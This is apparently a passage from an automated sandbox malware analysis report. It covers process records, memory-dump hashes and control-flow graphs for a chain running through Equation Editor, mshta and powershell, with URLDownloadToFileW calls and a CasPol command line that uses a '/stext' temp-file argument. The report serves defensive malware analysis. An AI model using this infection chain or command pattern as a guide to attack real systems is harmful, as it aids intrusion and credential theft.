                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:24
                                                                                                                                                                        Start time:11:27:25
                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
                                                                                                                                                                        Imagebase:0x1f0000
                                                                                                                                                                        File size:107'704 bytes
                                                                                                                                                                        MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Reset < >
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Offset: 008DF000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_8df000_EQNEDT32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 47ab4dd8a6351217991f966a9fe75ac0cf419884157d4c6339a95da6cab63a57
                                                                                                                                                                          • Instruction ID: 7cdda71cb56d0c6a3c40bf960755c6ceb4146317dbc5b532204139766040adef
                                                                                                                                                                          • Opcode Fuzzy Hash: 47ab4dd8a6351217991f966a9fe75ac0cf419884157d4c6339a95da6cab63a57
                                                                                                                                                                          • Instruction Fuzzy Hash: 3011AE524AFBD54FD3035B79A861090BFB4AD5725934B46D7C0C0CF1B3D66A080EC3A2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000009.00000003.429507818.00000000028C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_9_3_28c0000_mshta.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                          • Instruction ID: 5b5d5254cf3d2e31a10b75c4f0f750729654c248d5628a78226064a576ea65de
                                                                                                                                                                          • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000009.00000003.429507818.00000000028C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_9_3_28c0000_mshta.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                          • Instruction ID: 5b5d5254cf3d2e31a10b75c4f0f750729654c248d5628a78226064a576ea65de
                                                                                                                                                                          • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000009.00000003.429507818.00000000028C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_9_3_28c0000_mshta.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                          • Instruction ID: 5b5d5254cf3d2e31a10b75c4f0f750729654c248d5628a78226064a576ea65de
                                                                                                                                                                          • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:7.5%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:17%
                                                                                                                                                                          Total number of Nodes:47
                                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                                          execution_graph 4612 7543b0 4614 7543b4 4612->4614 4613 75452e 4614->4613 4620 754775 4614->4620 4628 754548 4614->4628 4637 7548d8 4614->4637 4641 754547 4614->4641 4615 75450f 4621 7546ca 4620->4621 4625 7546d9 4620->4625 4622 754918 URLDownloadToFileW 4621->4622 4621->4625 4624 7549d8 4622->4624 4624->4615 4650 901770 4625->4650 4658 901754 4625->4658 4629 75457c 4628->4629 4630 754918 URLDownloadToFileW 4629->4630 4632 754660 4629->4632 4634 7546d9 4629->4634 4633 7549d8 4630->4633 4632->4615 4633->4615 4635 901770 3 API calls 4634->4635 4636 901754 3 API calls 4634->4636 4635->4634 4636->4634 4638 754829 4637->4638 4638->4637 4639 901770 4 API calls 4638->4639 4640 901754 4 API calls 4638->4640 4639->4638 4640->4638 4642 75457c 4641->4642 4643 754918 URLDownloadToFileW 4642->4643 4646 754660 4642->4646 4647 7546d9 4642->4647 4645 7549d8 4643->4645 4645->4615 4646->4615 4648 901770 3 API calls 4647->4648 4649 901754 3 API calls 4647->4649 4648->4647 4649->4647 4651 901bf3 4650->4651 4652 9017a1 4650->4652 4651->4625 4652->4651 4654 754775 4 API calls 4652->4654 4655 754547 4 API calls 4652->4655 4657 754548 4 API calls 4652->4657 4666 754930 4652->4666 4653 901b94 4653->4625 4654->4653 4655->4653 4657->4653 4659 9017a1 4658->4659 4660 901bf3 4658->4660 4659->4660 4662 754775 4 API calls 4659->4662 4663 754547 4 API calls 4659->4663 4664 754930 URLDownloadToFileW 4659->4664 4665 754548 4 API calls 4659->4665 4660->4625 4661 901b94 4661->4625 4662->4661 4663->4661 4664->4661 4665->4661 4667 75497b URLDownloadToFileW 4666->4667 4669 7549d8 4667->4669 4669->4653

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 754548-75457a 1 7545c0 0->1 2 75457c-754583 0->2 3 7545c3-7545ff 1->3 4 754585-754592 2->4 5 754594 2->5 11 754605-75460e 3->11 12 754688-754693 3->12 6 754596-754598 4->6 5->6 9 75459f-7545a1 6->9 10 75459a-75459d 6->10 13 7545a3-7545b0 9->13 14 7545b2 9->14 15 7545be 10->15 11->12 18 754610-754616 11->18 16 754695-754698 12->16 17 7546a2-7546c4 12->17 19 7545b4-7545b6 13->19 14->19 15->3 16->17 27 75478e-754826 17->27 28 7546ca-7546d3 17->28 20 75461c-754629 18->20 21 754918-754982 18->21 19->15 23 75467f-754686 20->23 24 75462b-75465e 20->24 33 754984-75498a 21->33 34 75498d-754993 21->34 23->12 23->18 39 754660-754663 24->39 40 75467b 24->40 63 754829-754882 27->63 28->21 30 7546d9-754717 28->30 48 754731-754744 30->48 49 754719-75472f 30->49 33->34 37 754995-75499e 34->37 38 7549a1-7549d6 URLDownloadToFileW 34->38 37->38 42 7549df-7549f3 38->42 43 7549d8-7549de 38->43 44 754665-754668 39->44 45 75466f-754678 39->45 40->23 43->42 44->45 51 754746-75474d 48->51 49->51 52 754772 51->52 53 75474f-754760 51->53 52->27 53->52 57 754762-75476b 53->57 57->52 75 754885 call 901770 63->75 76 754885 call 901754 63->76 68 754887-754890 69 754892-7548a8 68->69 70 7548aa-7548bd 68->70 71 7548bf-7548c6 69->71 70->71 72 7548d5-7548df 71->72 73 7548c8-7548ce 71->73 72->63 73->72 75->68 76->68
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455127026.0000000000750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_750000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8e7e7f7bc72b9c2ea957a9131cecd4979679b9855fdb49089f5d51f3fd1fd7aa
                                                                                                                                                                          • Instruction ID: 9ab2482d8b911788719c69200fa06a02baa0c09dd7ea6fbc45207cecad432f35
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e7e7f7bc72b9c2ea957a9131cecd4979679b9855fdb49089f5d51f3fd1fd7aa
                                                                                                                                                                          • Instruction Fuzzy Hash: A2E11574A00219AFDB04DF98D884ADEBBF2FF89314F248559E804AB361C775ED95CB90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 77 754930-754982 79 754984-75498a 77->79 80 75498d-754993 77->80 79->80 81 754995-75499e 80->81 82 7549a1-7549d6 URLDownloadToFileW 80->82 81->82 83 7549df-7549f3 82->83 84 7549d8-7549de 82->84 84->83
                                                                                                                                                                          APIs
                                                                                                                                                                          • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 007549C9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455127026.0000000000750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_750000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DownloadFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1407266417-0
                                                                                                                                                                          • Opcode ID: fcf6ca19356dc21603af2e325bbc38cd225a55c1ae5fe255a1deff371b774943
                                                                                                                                                                          • Instruction ID: 7ef03f5491492170221783d5fc9b1131b1bb2cdb2006368c44787b257805600c
                                                                                                                                                                          • Opcode Fuzzy Hash: fcf6ca19356dc21603af2e325bbc38cd225a55c1ae5fe255a1deff371b774943
                                                                                                                                                                          • Instruction Fuzzy Hash: AB21F4B1D006199FCB00CF9AD885ADEFBB5FF48314F10852AE818A7250D374AA54CFA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 190 901770-90179b 191 9017a1-9017a6 190->191 192 901c52-901c85 190->192 193 9017a8-9017ae 191->193 194 9017be-9017c3 191->194 200 901c95 192->200 201 901c87-901c93 192->201 196 9017b0 193->196 197 9017b2-9017bc 193->197 198 9017d3 194->198 199 9017c5-9017d1 194->199 196->194 197->194 202 9017d5-9017d7 198->202 199->202 203 901c97-901c99 200->203 201->203 205 901bf3-901bfd 202->205 206 9017dd-9017e7 202->206 210 901cdb-901ce5 203->210 211 901c9b-901ca2 203->211 207 901c0b-901c11 205->207 208 901bff-901c08 205->208 206->192 209 9017ed-9017f2 206->209 215 901c13-901c15 207->215 216 901c17-901c23 207->216 217 9017f4-9017fa 209->217 218 90180a-901818 209->218 213 901ce7-901ceb 210->213 214 901cee-901cf4 210->214 211->210 212 901ca4-901cc1 211->212 229 901cc3-901cd5 212->229 230 901d29-901d2e 212->230 220 901cf6-901cf8 214->220 221 901cfa-901d06 214->221 219 901c25-901c4f 215->219 216->219 222 9017fc 217->222 223 9017fe-901808 217->223 218->205 228 90181e-90183d 218->228 226 901d08-901d26 220->226 221->226 222->218 223->218 228->205 240 901843-90184d 228->240 229->210 230->229 240->192 241 901853-901858 240->241 242 901870-901874 241->242 243 90185a-901860 241->243 242->205 246 90187a-90187e 242->246 244 901862 243->244 245 901864-90186e 243->245 244->242 245->242 246->205 247 901884-901888 246->247 247->205 249 90188e-90189e 247->249 250 9018a4-9018cb 249->250 251 901926-901975 249->251 256 9018e5-901913 250->256 257 9018cd-9018d3 250->257 268 90197c-90198f 251->268 266 901921-901924 256->266 267 901915-901917 256->267 258 9018d5 257->258 259 9018d7-9018e3 257->259 258->256 259->256 266->268 267->266 269 901995-9019bc 268->269 270 901a17-901a66 268->270 275 9019d6-901a04 269->275 276 9019be-9019c4 269->276 287 901a6d-901a80 270->287 284 901a12-901a15 275->284 285 901a06-901a08 275->285 277 9019c6 276->277 278 9019c8-9019d4 276->278 277->275 278->275 284->287 285->284 288 901a86-901aad 287->288 289 901b08-901b57 287->289 294 901ac7-901af5 288->294 295 901aaf-901ab5 288->295 306 901b5e-901b8c 289->306 303 901b03-901b06 294->303 304 901af7-901af9 294->304 296 901ab7 295->296 297 901ab9-901ac5 295->297 296->294 297->294 303->306 304->303 311 901b8f call 754775 306->311 312 901b8f call 754547 306->312 313 901b8f call 754930 306->313 314 901b8f call 754548 306->314 309 901b94-901bf0 311->309 312->309 313->309 314->309
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d4f8ccd0c94bccea79b324751ed69ed613f9b62713d3b582e11d2e149f1dc40d
                                                                                                                                                                          • Instruction ID: 049fee79d0c8ddf37717afc65e2ee3056e676985ff4a0b39598e31260abf9a4a
                                                                                                                                                                          • Opcode Fuzzy Hash: d4f8ccd0c94bccea79b324751ed69ed613f9b62713d3b582e11d2e149f1dc40d
                                                                                                                                                                          • Instruction Fuzzy Hash: C0F12634B002149FDB149FA8D440B6EBBE6FFC9710F24856AE815AB3A1DB71DD81CB91

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 396 901754-90179b 397 9017a1-9017a6 396->397 398 901c52-901c85 396->398 399 9017a8-9017ae 397->399 400 9017be-9017c3 397->400 406 901c95 398->406 407 901c87-901c93 398->407 402 9017b0 399->402 403 9017b2-9017bc 399->403 404 9017d3 400->404 405 9017c5-9017d1 400->405 402->400 403->400 408 9017d5-9017d7 404->408 405->408 409 901c97-901c99 406->409 407->409 411 901bf3-901bfd 408->411 412 9017dd-9017e7 408->412 416 901cdb-901ce5 409->416 417 901c9b-901ca2 409->417 413 901c0b-901c11 411->413 414 901bff-901c08 411->414 412->398 415 9017ed-9017f2 412->415 421 901c13-901c15 413->421 422 901c17-901c23 413->422 423 9017f4-9017fa 415->423 424 90180a-901818 415->424 419 901ce7-901ceb 416->419 420 901cee-901cf4 416->420 417->416 418 901ca4-901cc1 417->418 435 901cc3-901cd5 418->435 436 901d29-901d2e 418->436 426 901cf6-901cf8 420->426 427 901cfa-901d06 420->427 425 901c25-901c4f 421->425 422->425 428 9017fc 423->428 429 9017fe-901808 423->429 424->411 434 90181e-90183d 424->434 432 901d08-901d26 426->432 427->432 428->424 429->424 434->411 446 901843-90184d 434->446 435->416 436->435 446->398 447 901853-901858 446->447 448 901870-901874 447->448 449 90185a-901860 447->449 448->411 452 90187a-90187e 448->452 450 901862 449->450 451 901864-90186e 449->451 450->448 451->448 452->411 453 901884-901888 452->453 453->411 455 90188e-90189e 453->455 456 9018a4-9018cb 455->456 457 901926-901975 455->457 462 9018e5-901913 456->462 463 9018cd-9018d3 456->463 474 90197c-90198f 457->474 472 901921-901924 462->472 473 901915-901917 462->473 464 9018d5 463->464 465 9018d7-9018e3 463->465 464->462 465->462 472->474 473->472 475 901995-9019bc 474->475 476 901a17-901a66 474->476 481 9019d6-901a04 475->481 482 9019be-9019c4 475->482 493 901a6d-901a80 476->493 490 901a12-901a15 481->490 491 901a06-901a08 481->491 483 9019c6 482->483 484 9019c8-9019d4 482->484 483->481 484->481 490->493 491->490 494 901a86-901aad 493->494 495 901b08-901b57 493->495 500 901ac7-901af5 494->500 501 901aaf-901ab5 494->501 512 901b5e-901b8c 495->512 509 901b03-901b06 500->509 510 901af7-901af9 500->510 502 901ab7 501->502 503 901ab9-901ac5 501->503 502->500 503->500 509->512 510->509 517 901b8f call 754775 512->517 518 901b8f call 754547 512->518 519 901b8f call 754930 512->519 520 901b8f call 754548 512->520 515 901b94-901bf0 517->515 518->515 519->515 520->515
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f616c1521de4b6763871da482247f15dd6c458a0522b736270acb26a5d9c4572
                                                                                                                                                                          • Instruction ID: 4c3cb7f52af4546104bac155b56d84db3d78ca498ea7b0afd73821080a60d2c1
                                                                                                                                                                          • Opcode Fuzzy Hash: f616c1521de4b6763871da482247f15dd6c458a0522b736270acb26a5d9c4572
                                                                                                                                                                          • Instruction Fuzzy Hash: D2919C34B00205DFDB24DF58D440BAAB7B6FF88710F25856AE914AB3A1DB71ED81CB90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 521 900998-9009aa 522 9009b0-9009c1 521->522 523 900a6a-900a9d 521->523 528 9009c3-9009c9 522->528 529 9009db-9009f8 522->529 526 900b0b-900b15 523->526 527 900a9f-900ade 523->527 530 900b20-900b26 526->530 531 900b17-900b1d 526->531 550 900ae0-900aee 527->550 551 900b5b-900b60 527->551 532 9009cb 528->532 533 9009cd-9009d9 528->533 529->523 538 9009fa-900a1c 529->538 535 900b28-900b2a 530->535 536 900b2c-900b38 530->536 532->529 533->529 539 900b3a-900b58 535->539 536->539 545 900a36-900a4e 538->545 546 900a1e-900a24 538->546 556 900a50-900a52 545->556 557 900a5c-900a67 545->557 548 900a26 546->548 549 900a28-900a34 546->549 548->545 549->545 559 900af6-900b05 550->559 551->550 556->557 559->526
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 43d267b6e03f2bb984c48d6a13c7de0c246e8e7bf085df7ff8f4d63a878de8d5
                                                                                                                                                                          • Instruction ID: 6dfffe28d44cfa03cf73273a69ea57b3cd9a287413a1de413f1cacf10a7a9e9c
                                                                                                                                                                          • Opcode Fuzzy Hash: 43d267b6e03f2bb984c48d6a13c7de0c246e8e7bf085df7ff8f4d63a878de8d5
                                                                                                                                                                          • Instruction Fuzzy Hash: A0514631B043149FDB209B688854B6ABBE5EFC5B10F24C06AE949DF3D2CA718D45C7A1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 721 900a7d-900a9d 722 900b0b-900b15 721->722 723 900a9f-900ade 721->723 724 900b20-900b26 722->724 725 900b17-900b1d 722->725 734 900ae0-900aee 723->734 735 900b5b-900b60 723->735 726 900b28-900b2a 724->726 727 900b2c-900b38 724->727 729 900b3a-900b58 726->729 727->729 739 900af6-900b05 734->739 735->734 739->722
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8d0b7de5eda71a9cf1cae8494efb552833ae8ccb569b4355d9e872674e144626
                                                                                                                                                                          • Instruction ID: 833ca8aba4c9efc63d0db6e47a3ea0161b5c08a438050f5436c8927aeadd6949
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d0b7de5eda71a9cf1cae8494efb552833ae8ccb569b4355d9e872674e144626
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E0122247043842FD721626A4850BAB7FAAEFC2714F14C06AE989CB3D3D6619D849360

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 770 26d01d-26d03d 771 26d03f-26d04a 770->771 772 26d08d-26d095 770->772 773 26d082-26d089 771->773 774 26d04c-26d05a 771->774 772->771 773->774 779 26d08b 773->779 776 26d060 774->776 778 26d063-26d06b 776->778 780 26d06d-26d075 778->780 781 26d07b-26d080 778->781 779->778 781->780
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.454949667.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_26d000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 604503960661181d716ec6895500d68c2c2d9c8e2bcbf989b448fc4dc9b411af
                                                                                                                                                                          • Instruction ID: 45b0142dce0ecab333de4a8091c5c6f9545865a404e2123f651090d29e4045a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 604503960661181d716ec6895500d68c2c2d9c8e2bcbf989b448fc4dc9b411af
                                                                                                                                                                          • Instruction Fuzzy Hash: 2501F731A14348ABEB205E15C8C4767BB98DF81364F28C41AEC451B182D2799D85DAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.454949667.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_26d000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5917b3dad6802c877c3ca37aa4c8b223844e26942317192302ca09137ff99794
                                                                                                                                                                          • Instruction ID: b1ae9ae2a060e42636355b1d0c98c0c3e7e7ae120bcfb921839c7f7fa8ca2cf6
                                                                                                                                                                          • Opcode Fuzzy Hash: 5917b3dad6802c877c3ca37aa4c8b223844e26942317192302ca09137ff99794
                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0C271504244AFEB208E16CCC4BA3FBD8EB81738F18C45AED481E282C2799C84CAB0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`$`
                                                                                                                                                                          • API String ID: 0-2632813216
                                                                                                                                                                          • Opcode ID: 9fb049c803eb6554f188921e87999171d49af8fc0bf83cf154f146108b4d046f
                                                                                                                                                                          • Instruction ID: ae81de0e08a93df473924fa268ce8041f29a04d50f853930f63487980f94c965
                                                                                                                                                                          • Opcode Fuzzy Hash: 9fb049c803eb6554f188921e87999171d49af8fc0bf83cf154f146108b4d046f
                                                                                                                                                                          • Instruction Fuzzy Hash: 10E12531B04248DFDF159A68C8507BE7BAAAFC1310F148476E9159B2E2DB74CD81CBA2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.455187322.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_900000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (Fa$L4#p$L4#p$L4#p
                                                                                                                                                                          • API String ID: 0-1089117475
                                                                                                                                                                          • Opcode ID: 64fb57b6df9c365daff5613bd29bdca9c37336e160fd90db405c40cab7555bc6
                                                                                                                                                                          • Instruction ID: 3b007389965be73bf9b0a165e9772bde82b7d1ac6bbf5e3ecb54ccf478f95cb9
                                                                                                                                                                          • Opcode Fuzzy Hash: 64fb57b6df9c365daff5613bd29bdca9c37336e160fd90db405c40cab7555bc6
                                                                                                                                                                          • Instruction Fuzzy Hash: A0616330B002489FDB159F64C8507BE7BAAEFC1310F148176E9058B2D2DB79ED95CBA2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000011.00000002.587327950.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1dd000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4b90767d278ab9ba6d65a9fbf5d802b0b852b34f13cf2dba7bb90446ccebdced
                                                                                                                                                                          • Instruction ID: 6c34360ea9998e3d6e6a8f75a56f525c90fa8105b8a0075e16caf1cbf44329a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b90767d278ab9ba6d65a9fbf5d802b0b852b34f13cf2dba7bb90446ccebdced
                                                                                                                                                                          • Instruction Fuzzy Hash: 3301FD71104340ABEB209E25ECC4B67BB98EFC1324F28C41BFC490B382C3799945CAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000011.00000002.587327950.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_17_2_1dd000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c72cf08cf6822aa66ab767bd1c0b10c87b23991c93d67fe62758812ab8b19737
                                                                                                                                                                          • Instruction ID: aea16f87bffcf236503954fc1fbecbb1142280eefefd6d8cad2f6745b1337664
                                                                                                                                                                          • Opcode Fuzzy Hash: c72cf08cf6822aa66ab767bd1c0b10c87b23991c93d67fe62758812ab8b19737
                                                                                                                                                                          • Instruction Fuzzy Hash: 0701716140D3C09FD7128B259C94B52BFB4DF93228F19C1DBE8888F2A3C2699C48C772

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:6.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:61
                                                                                                                                                                          Total number of Limit Nodes:6
